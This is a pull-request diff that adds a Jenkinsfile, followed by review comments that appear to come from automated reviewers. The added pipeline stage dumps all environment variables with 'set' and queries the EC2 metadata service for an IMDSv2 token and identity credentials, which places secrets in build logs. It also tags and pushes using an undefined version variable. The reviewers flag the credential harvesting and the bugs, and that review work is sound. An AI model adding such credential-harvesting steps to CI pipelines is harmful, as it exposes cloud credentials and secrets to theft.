48 changes: 48 additions & 0 deletions Jenkinsfile
@@ -0,0 +1,48 @@
pipeline {
agent any

stages {

stage('Environment, User and EC2 Metadata') {
steps {
sshagent(credentials: ['jenkins-github']) {
script {
sh "git tag '${version}'"
sh "git push origin '${version}'"

Bug: Undefined version variable used for git tagging

The ${version} variable is referenced in the git tag and git push commands but is never defined anywhere in the pipeline. There's no parameters block, environment block, or script variable assignment for version. This will either create a git tag with an empty/null value or cause the pipeline to fail, potentially corrupting the repository's tag history.

sh '''
echo "=== Environment Variables (set) ==="
set

echo ""
echo "=== User Information ==="
echo "UID: $(id -u)"
echo "Username: $(id -un)"
echo "Full id output:"
id

echo ""
echo "=== EC2 Metadata Token (IMDSv2) ==="
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

if [ -z "$TOKEN" ]; then
echo "No se pudo obtener token. Este nodo probablemente NO es una EC2 o IMDSv2 está deshabilitado."
else
echo "Token obtenido correctamente."
fi

echo ""
echo "=== EC2 Identity Credentials ==="
if [ ! -z "$TOKEN" ]; then
curl -s \
-H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/ || \
echo "No se pudo acceder al endpoint identity-credentials."
fi
'''
}
}
}
}
}
}
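Review bot: the `sshagent(credentials: ['jenkins-github'])` block scopes the GitHub deploy key to far more than the two git commands that need it: the same `script` then runs `set`, which prints the agent's entire environment (including `SSH_AUTH_SOCK` for that key) unfiltered into the build log, and queries the instance metadata service, none of which requires the credential. Narrow the `sshagent` block to the `git tag` / `git push` lines, and drop the `set` dump and the metadata calls from anything that can be merged. The `sh "git tag '${version}'"` and `sh "git push origin '${version}'"` steps also interpolate a Groovy variable into a double-quoted shell string, and `version` is declared nowhere in the file; define it in a `parameters` block, export it through `environment`, and use single-quoted `sh` strings (e.g. `sh 'git tag "$VERSION"'`) so the shell rather than Groovy expands it.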

Bug: Pipeline exposes environment variables and AWS credentials

This Jenkinsfile contains code that harvests sensitive information: the set command dumps all environment variables (potentially exposing secrets, API keys, and credentials), and the script accesses the EC2 metadata service at 169.254.169.254 to retrieve AWS identity credentials. Accessing /latest/meta-data/identity-credentials/ec2/ is a known technique for credential theft from cloud instances. Even if intended as an infosec test, this code exposes sensitive data in build logs and poses serious security risks if merged.